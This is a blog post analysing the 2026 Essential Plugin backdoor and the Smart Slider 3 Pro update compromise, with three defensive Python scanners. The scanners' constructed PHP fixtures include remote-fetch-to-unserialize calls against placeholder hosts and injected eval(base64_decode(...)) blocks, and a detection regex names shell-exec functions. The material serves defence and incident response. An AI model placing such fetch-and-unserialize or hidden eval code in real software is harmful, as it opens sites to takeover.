In July 2025, Flippa published a case study celebrating the six-figure sale of a WordPress plugin portfolio called Essential Plugin. The buyer, identified in subsequent security research only as “Kris,” had a background in SEO, cryptocurrency marketing, and online gambling. On May 12, 2025, a new committer account appeared in WordPress.org’s SVN system with access to all 26 plugins. On August 8, 2025, Kris pushed version 2.6.7 with a changelog entry reading “Check compatibility with WordPress version 6.8.2.” The actual change was 191 lines of backdoor code. It sat dormant for eight months. On April 6, 2026, between 04:22 and 11:06 UTC, it activated and ran against every site that had the plugin installed. WordPress.org closed all 31 plugins from the account on April 7. The same week, an entirely separate attacker compromised Smart Slider 3 Pro’s update infrastructure and pushed a payload that exfiltrated admin usernames and passwords in plaintext from every site that ran the update.
How the Essential Plugin Backdoor Worked
The 191 lines of malicious PHP were hidden inside the plugins’ existing wpos-analytics module, which had previously been a legitimate analytics component. The weaponized fetch_ver_info() method called file_get_contents() against the attacker’s server at analytics.essentialplugin.com and passed the response directly to @unserialize(), a textbook PHP object injection vector that allows arbitrary code execution. The deserialized object then wrote files to disk via file_put_contents().
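The fetch-then-unserialize chain described above is also the easiest part of this backdoor to hunt for in source, because a plugin almost never has a legitimate reason to hand the body of a remote HTTP response to unserialize(). The following scanner is an added example written for this post, not code from the Essential Plugin, Patchstack or WordPress.org; it tracks variables assigned from a remote fetch and flags any unserialize() call they reach, treating unserialize() with allowed_classes => false as safe. The PHP fixtures are constructed, with placeholder hostnames, and only mirror the shape the text describes.

```python
"""Heuristic PHP source scan for the remote-fetch -> unserialize() pattern.

Hypothetical example for this article. Regex-based, so it is a triage aid, not a
parser: it follows simple same-file assignments only and will miss data passed
through function arguments or class properties. Review every hit by hand.
"""
import re
from pathlib import Path
from typing import Dict, List, Tuple

# Calls whose return value is controlled by the remote server when given a URL.
REMOTE_FETCH = (r"(?:file_get_contents|wp_remote_get|wp_remote_post|"
                r"wp_remote_retrieve_body|curl_exec)\s*\(")
# unserialize(...) or maybe_unserialize(...), with everything up to the statement end as group 1.
UNSERIALIZE_CALL = re.compile(r"@?\b(?:maybe_)?unserialize\s*\(([^;]*)")
ASSIGN_FROM_FETCH = re.compile(r"(\$\w+)\s*=(?!=)\s*@?" + REMOTE_FETCH)
ASSIGN_ANY = re.compile(r"(\$\w+)\s*=(?!=)\s*([^;]*);")
# allowed_classes => false prevents object instantiation, so no gadget chain can fire.
SAFE_OPTION = re.compile(r"allowed_classes'?\s*=>\s*false")
PHP_VAR = re.compile(r"\$\w+")


def find_remote_unserialize(php_source: str) -> List[Tuple[int, str]]:
    """Return (line number, stripped line) for each unserialize() fed by remote data."""
    tainted = set()                 # variables that hold a remote response body
    findings: List[Tuple[int, str]] = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        m = UNSERIALIZE_CALL.search(line)
        if m and not SAFE_OPTION.search(m.group(1)):
            arg = m.group(1)
            direct = re.search(REMOTE_FETCH, arg) is not None      # unserialize(file_get_contents(...))
            indirect = bool(set(PHP_VAR.findall(arg)) & tainted)   # unserialize($body)
            if direct or indirect:
                findings.append((lineno, line.strip()))
        a = ASSIGN_FROM_FETCH.search(line)
        if a:
            tainted.add(a.group(1))
            continue
        a = ASSIGN_ANY.search(line)   # propagate taint through plain reassignment
        if a and (set(PHP_VAR.findall(a.group(2))) & tainted):
            tainted.add(a.group(1))
    return findings


def scan_tree(root: str) -> Dict[str, List[Tuple[int, str]]]:
    """Scan every .php file under root (e.g. wp-content/plugins) and map path -> findings."""
    hits = {}
    for p in Path(root).rglob("*.php"):
        found = find_remote_unserialize(p.read_text(errors="replace"))
        if found:
            hits[str(p)] = found
    return hits


# Constructed fixtures. The class and method names echo the article; the hostnames
# are placeholders and none of this is the published backdoor code.
SUSPICIOUS_PHP = """<?php
// Constructed sample shaped like the pattern the article describes.
class Wpos_Analytics_Stub {
    public function fetch_ver_info() {
        $url  = 'https://analytics.example.invalid/ver.php';
        $body = @file_get_contents($url);
        $info = @unserialize($body);
        return $info;
    }
}
"""
DIRECT_PHP = """<?php
$cfg = unserialize(file_get_contents('https://updates.example.invalid/cfg.txt'));
"""
SAFE_PHP = """<?php
function fetch_ver_info_safe() {
    $resp = wp_remote_get('https://updates.example.invalid/ver.json');
    $body = wp_remote_retrieve_body($resp);
    $data = json_decode($body, true);                           // no object instantiation
    $opts = unserialize($body, ['allowed_classes' => false]);  // no object injection either
    return $data ?: $opts;
}
"""

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_PHP), ("direct", DIRECT_PHP), ("safe", SAFE_PHP)):
        print(name, find_remote_unserialize(src))
```

Run scan_tree() over a plugins directory after any ownership change or unexplained "compatibility" release; a hit on a module that used to be plain analytics code is exactly the signal that would have caught version 2.6.7 months before the C2 woke up.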
On activation, the module dropped a file named wp-comments-posts.php into the webroot, deliberately mimicking the legitimate WordPress core file wp-comments-post.php. It also injected a PHP block directly into wp-config.php. The injected code checked the visitor’s User-Agent: when it matched Googlebot, it served hidden spam links, redirects, and fake pages. Normal visitors and logged-in admins saw nothing. This is the standard technique for black-hat gambling and casino SEO campaigns, where poisoning a search engine’s index matters more than any change visible to humans. The payload also registered an unauthenticated REST API endpoint providing a second path to arbitrary code execution independent of the deserialization chain.
The command-and-control infrastructure resolved its address through an Ethereum smart contract queried via public blockchain RPC endpoints rather than a conventional domain. The specific chain has not been published by any researcher. The practical consequence: the C2 cannot be taken down through a registrar complaint or DNS blacklist. The attacker can update the contract to point to a new server at any time without touching the malware code already deployed on infected sites.
Kris’s profile (SEO professional with online gambling marketing experience) maps directly onto every technical choice: Googlebot cloaking is the standard tool of gambling SEO spam, and blockchain-based C2 is a natural choice for someone familiar with cryptocurrency infrastructure. The attack was not technically sophisticated by nation-state standards. It was technically appropriate for exactly what it was trying to do.
The Remediation Gap
WordPress.org’s response on April 7 included a forced update to version 2.6.9.1 for affected sites and permanent closure of all 31 plugins from the account. The forced update disabled the wpos-analytics phone-home mechanism. It did not remove the PHP code already written into wp-config.php. WordPress.org’s official warning to affected sites stated directly: “While our update attempted to remove the backdoor automatically, it cannot confirm that it was fully eliminated.” Sites that were compromised during the six-hour-44-minute activation window on April 6 are still serving Googlebot spam after updating unless their wp-config.php and webroot have been manually inspected and cleaned. Standard plugin update status checks will show these sites as current and clean.
Smart Slider 3 Pro: A Different Attack, the Same Week
The Essential Plugin incident was still being analyzed when a second, unrelated attack hit Smart Slider 3 Pro, which has more than 800,000 installations across its free and Pro editions. This attack did not involve purchasing the plugin. An attacker compromised Nextend’s own update infrastructure servers and pushed malicious version 3.5.1.35 Pro, which was live for approximately six hours before detection.
The Smart Slider 3.5.1.35 payload was substantially more aggressive than the Essential Plugin SEO spam operation. It exfiltrated the site URL, admin email, admin username and password in plaintext, database name, WordPress version, PHP version, and a list of all installed persistence mechanisms to C2 domain wpjs1[.]com. It then installed three independent persistence mechanisms: a must-use plugin named object-cache-helper.php, code appended to the active theme’s functions.php, and a file named class-wp-locale-helper.php dropped into wp-includes/. It registered an init action that, when triggered with the correct GET parameter, ran arbitrary PHP via eval() or attempted OS command execution through six different PHP functions. Nextend pulled the malicious update, shut down update servers temporarily, and released clean version 3.5.1.36 Pro.
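Both incidents leave artifacts that a plain version check will never see: the wp-comments-posts.php drop and the wp-config.php injection from Essential Plugin, and the mu-plugin, wp-includes file and functions.php tail from Smart Slider 3.5.1.35. The sweep below is an added example written for this post, not a tool from WordPress.org, Patchstack, Wordfence or Nextend. The file paths are the ones named in the text; the content heuristics (which calls and which structure count as suspicious in wp-config.php and functions.php) are this example's own assumptions, and the injected fixture is constructed, since the real injected code was not published.

```python
"""Post-update indicator sweep for one WordPress site root (hypothetical example)."""
import re
import tempfile
from pathlib import Path
from typing import List

# Artifacts named in the article, relative to the site root.
DROPPED_FILES = [
    "wp-comments-posts.php",                          # Essential Plugin; core is wp-comments-post.php
    "wp-content/mu-plugins/object-cache-helper.php",  # Smart Slider 3.5.1.35
    "wp-includes/class-wp-locale-helper.php",         # Smart Slider 3.5.1.35
]
# Calls that have no business in wp-config.php or at the tail of a theme's functions.php.
SUSPECT_CALLS = re.compile(
    r"\b(eval|assert|base64_decode|gzinflate|gzuncompress|str_rot13|system|exec|"
    r"shell_exec|passthru|proc_open|popen|file_put_contents|unserialize)\s*\(")
STOP_MARKER = "/* That's all, stop editing!"  # prefix of the stock wp-config.php comment


def scan_wp_config(text: str) -> List[str]:
    """Heuristics for a PHP block that was injected into wp-config.php."""
    issues: List[str] = []
    if text.count("<?php") > 1:
        issues.append("multiple <?php open tags (the stock file has exactly one)")
    calls = sorted(set(SUSPECT_CALLS.findall(text)))
    if calls:
        issues.append("suspect calls: " + ", ".join(calls))
    if "HTTP_USER_AGENT" in text:
        issues.append("inspects HTTP_USER_AGENT (cloaking indicator)")
    if STOP_MARKER in text:
        # Only the ABSPATH define and the wp-settings.php require belong after the marker.
        tail = text.split(STOP_MARKER, 1)[1].splitlines()[1:]
        extra = [ln for ln in tail
                 if ln.strip() and ln.strip() not in ("{", "}")
                 and not ln.strip().startswith(("/*", "*", "//", "#"))
                 and "ABSPATH" not in ln and "wp-settings.php" not in ln]
        if extra:
            issues.append(f"{len(extra)} unexpected code line(s) after the stop-editing marker")
    return issues


def scan_theme_functions(text: str) -> List[str]:
    """functions.php legitimately does a lot, so only the obfuscation/exec calls are flagged."""
    calls = sorted(set(SUSPECT_CALLS.findall(text)))
    return ["suspect calls: " + ", ".join(calls)] if calls else []


def scan_site(root: Path) -> List[str]:
    """Run every check against one site root and return human-readable findings."""
    findings: List[str] = []
    for rel in DROPPED_FILES:
        if (root / rel).exists():
            findings.append(f"dropped file present: {rel}")
    cfg = root / "wp-config.php"
    if cfg.exists():
        findings += [f"wp-config.php: {i}" for i in scan_wp_config(cfg.read_text(errors="replace"))]
    # The active theme is only recorded in the database, so scan every theme's functions.php.
    for fn in sorted((root / "wp-content" / "themes").glob("*/functions.php")):
        findings += [f"{fn.relative_to(root)}: {i}"
                     for i in scan_theme_functions(fn.read_text(errors="replace"))]
    return findings


# Constructed fixtures: a stock-shaped wp-config.php and the same file with a second,
# obviously non-functional PHP block appended after the core require.
CLEAN_WP_CONFIG = """<?php
define( 'DB_NAME', 'example_db' );
define( 'DB_USER', 'example_user' );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';
"""
INJECTED_WP_CONFIG = CLEAN_WP_CONFIG + (
    "?>\n<?php\n"
    "if (isset($_SERVER['HTTP_USER_AGENT'])) { @eval(base64_decode('PLACEHOLDER')); }\n")


def build_sample_site() -> Path:
    """Write a constructed site tree carrying several of the indicators into a temp dir."""
    root = Path(tempfile.mkdtemp(prefix="wp-ioc-"))
    (root / "wp-includes").mkdir()
    (root / "wp-content" / "mu-plugins").mkdir(parents=True)
    theme = root / "wp-content" / "themes" / "example-theme"
    theme.mkdir(parents=True)
    (root / "wp-config.php").write_text(INJECTED_WP_CONFIG)
    (root / "wp-comments-post.php").write_text("<?php // stand-in for the legitimate core file\n")
    (root / "wp-comments-posts.php").write_text("<?php // stand-in for the dropped file\n")
    (root / "wp-content" / "mu-plugins" / "object-cache-helper.php").write_text("<?php // stand-in\n")
    (theme / "functions.php").write_text(
        "<?php\nadd_theme_support('post-thumbnails');\n"
        "// constructed appended tail:\n@eval(gzinflate(base64_decode('PLACEHOLDER')));\n")
    return root


if __name__ == "__main__":
    for line in scan_site(build_sample_site()):
        print(line)
```

Point scan_site() at each document root in a fleet and diff the output against a known-good baseline; the dropped-file checks are exact, while the wp-config.php and functions.php heuristics are deliberately noisy and are meant to queue a file for a human, not to auto-clean it.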
This Has Happened Before
The plugin acquisition attack pattern is not new. In 2017, Wordfence documented a buyer operating under the alias “Daley Tias” who purchased the Display Widgets plugin for approximately $15,000 and injected payday loan SEO spam, then went on to compromise at least nine plugins using the same acquisition-then-backdoor method. In 2022, AccessPress Themes was compromised via its own website rather than through a purchase, backdooring 40 themes and 53 plugins affecting 360,000 active installations. In June 2024, five plugins were backdoored through credential stuffing attacks on developer WordPress.org accounts. In July 2025, nine months before the Essential Plugin activation, the Gravity Forms official site was compromised and served a backdoored version to manual and Composer installs for two days.
The through-line across all of these incidents is the same structural gap: WordPress.org has no code signing for plugins, no mandatory two-factor authentication for plugin committers, and no security review triggered when a plugin changes hands. The plugin ownership transfer process is documented in the developer handbook and involves no automated scrutiny of the new owner’s identity or intentions. A buyer who completes a Flippa transaction and obtains SVN commit credentials has the same trusted status as the original developer who built the plugin over years.
What Managed WordPress Hosts Are Exposed To
The Essential Plugin case has a specific implication for managed WordPress hosts that operate automatic update pipelines. Any site updated between August 8, 2025 and April 7, 2026 received the backdoored version. Whether or not the C2 had activated by the time of that update, the code was present and waiting. Hosts that pushed automatic plugin updates to customer sites during that period may have distributed the backdoor at scale across their fleet. The remediation gap compounds this: a managed host’s standard site health checks will not detect the persistent wp-config.php injection. Detection requires checking for unexpected PHP blocks in wp-config.php, the presence of wp-comments-posts.php in the webroot, and Googlebot User-Agent responses that differ from standard visitor responses.
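The third check, comparing what a site serves to Googlebot against what it serves to an ordinary browser, is the one that catches the cloaking whether or not the file-level indicators were cleaned. The script below is an added example written for this post, not code from WordPress.org, Patchstack or the author. fetch_pair() uses only the standard library and needs network access; cloaking_report() is pure and is exercised here on constructed HTML. The User-Agent strings are the public Googlebot string and an ordinary Chrome string.

```python
"""Googlebot-versus-visitor cloaking check for one URL (hypothetical example)."""
import json
import re
import sys
import urllib.request
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/124.0 Safari/537.36")
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "source", "track", "wbr"}


class LinkCollector(HTMLParser):
    """Collect <a href> targets, noting which sit inside a hidden container."""

    def __init__(self) -> None:
        super().__init__()
        self.links: List[Tuple[str, bool]] = []   # (href, inside hidden element)
        self.title = ""
        self._stack: List[Tuple[str, bool]] = []  # open (tag, hidden) pairs
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = re.sub(r"\s+", "", (a.get("style") or "").lower())
        hidden = bool((self._stack and self._stack[-1][1]) or "hidden" in a
                      or "display:none" in style or "visibility:hidden" in style)
        if tag == "a" and a.get("href"):
            self.links.append((a["href"], hidden))
        if tag == "title":
            self._in_title = True
        if tag not in VOID_TAGS:
            self._stack.append((tag, hidden))

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        for i in range(len(self._stack) - 1, -1, -1):   # tolerate unbalanced markup
            if self._stack[i][0] == tag:
                del self._stack[i:]
                break

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def _parse(html: str) -> LinkCollector:
    p = LinkCollector()
    p.feed(html)
    p.close()
    return p


def cloaking_report(visitor_html: str, bot_html: str,
                    visitor_url: Optional[str] = None,
                    bot_url: Optional[str] = None) -> Dict[str, object]:
    """Diff what a browser got against what Googlebot got for the same URL."""
    v, b = _parse(visitor_html), _parse(bot_html)
    v_links = {h for h, _ in v.links}
    b_links = {h for h, _ in b.links}
    only_for_bot = sorted(b_links - v_links)
    # Hidden links count only when the visitor copy does not hide the same link.
    hidden_for_bot = sorted(h for h, hid in b.links if hid and (h, True) not in v.links)
    title_differs = v.title.strip() != b.title.strip()
    redirect_differs = bool(visitor_url and bot_url and visitor_url != bot_url)
    return {
        "only_for_bot": only_for_bot,
        "only_for_visitor": sorted(v_links - b_links),
        "hidden_links_for_bot": hidden_for_bot,
        "title_differs": title_differs,
        "redirect_differs": redirect_differs,
        "cloaked": bool(only_for_bot or hidden_for_bot or title_differs or redirect_differs),
    }


def fetch_pair(url: str, timeout: float = 10.0) -> List[Tuple[str, str]]:
    """Fetch url once per User-Agent; returns [(html, final_url), (html, final_url)]."""
    out = []
    for ua in (BROWSER_UA, GOOGLEBOT_UA):
        req = urllib.request.Request(url, headers={"User-Agent": ua, "Cache-Control": "no-cache"})
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            out.append((resp.read().decode("utf-8", errors="replace"), resp.geturl()))
    return out


# Constructed HTML: what a visitor sees versus what the same page serves to Googlebot.
VISITOR_HTML = ("<html><head><title>Acme Bakery</title></head><body>"
                "<a href='/menu'>Menu</a> <a href='/contact'>Contact</a></body></html>")
GOOGLEBOT_HTML = ("<html><head><title>Acme Bakery</title></head><body>"
                  "<a href='/menu'>Menu</a> <a href='/contact'>Contact</a>"
                  "<div style='display: none'><a href='https://spam.example.invalid/casino'>casino</a></div>"
                  "</body></html>")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        (vh, vu), (bh, bu) = fetch_pair(sys.argv[1])
        print(json.dumps(cloaking_report(vh, bh, vu, bu), indent=2))
    else:
        print(json.dumps(cloaking_report(VISITOR_HTML, GOOGLEBOT_HTML), indent=2))
```

Two caveats for running this across a fleet: full-page caches in front of the site can hand both requests the same cached copy, so fetch with caching bypassed or from the origin, and cloaking that keys on the client IP rather than the User-Agent will show identical pages to this check, which is why the wp-config.php and webroot inspection remains necessary alongside it.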
The Smart Slider 3 Pro incident demonstrates that the update channel itself is an attack surface separate from plugin ownership. A managed host that controls when plugins update does not control whether the plugin vendor’s update infrastructure has been compromised. Two separate incidents in the same week using the same delivery mechanism are not a coincidence. AspirePress, a community project building a distributed WordPress package repository with code signing and authenticity verification, represents the infrastructure-level response to this pattern. The EU Cyber Resilience Act, which identifies the WordPress Foundation as a software steward with explicit security obligations, may be the regulatory forcing function that moves this from a community project to a platform requirement.
Łukasz Nowak
Nearly two decades in IT. A decade in web hosting - and still in the trenches. Writing about the infrastructure that runs the internet from the inside.
Sources
- Someone Bought 30 WordPress Plugins and Planted a Backdoor in All of Them - Anchor.host (Austin Ginder, original discovery)
- Critical Supply Chain Compromise on Essential Plugin - Patchstack
- WordPress Plugins Backdoor: Supply Chain Attack via Flippa - The Next Web
- Someone Planted Backdoors in Dozens of WordPress Plugins - TechCrunch
- Official Warning From WordPress.org Plugins Team - WordPress.org
- WordPress Plugin Suite Hacked to Push Malware - BleepingComputer
- WordPress Plugin Backdoor Hits 20,000+ Active Installations - TechNadu
- Backdoored Smart Slider 3 Pro Update Distributed via Compromised Nextend Servers - The Hacker News
- Smart Slider 3 Pro Supply Chain Compromise: Full Malware Analysis - Patchstack
- Smart Slider 3 Pro Security Advisory - Nextend
- Supply Chain Attack on WordPress.org Plugins (June 2024) - Wordfence
- Over 90 WordPress Themes and Plugins Backdoored (AccessPress 2022) - BleepingComputer
- AspirePress - Distributed WordPress Package Repository With Code Signing